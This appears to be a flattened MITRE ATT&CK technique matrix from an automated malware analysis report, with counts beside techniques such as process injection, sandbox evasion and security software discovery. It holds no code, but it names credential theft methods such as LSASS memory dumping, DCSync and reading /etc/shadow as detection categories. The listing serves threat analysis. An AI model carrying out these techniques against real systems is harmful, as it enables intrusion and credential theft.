Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 PowerShell	1 DLL Side-Loading	612 Process Injection	1 Masquerading	1 OS Credential Dumping	121 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Abuse Elevation Control Mechanism	1 Disable or Modify Tools	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	41 Virtualization/Sandbox Evasion	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	612 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Abuse Elevation Control Mechanism	Cached Domain Credentials	113 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	4 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	12 Software Packing	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Timestomp	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 DLL Side-Loading	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement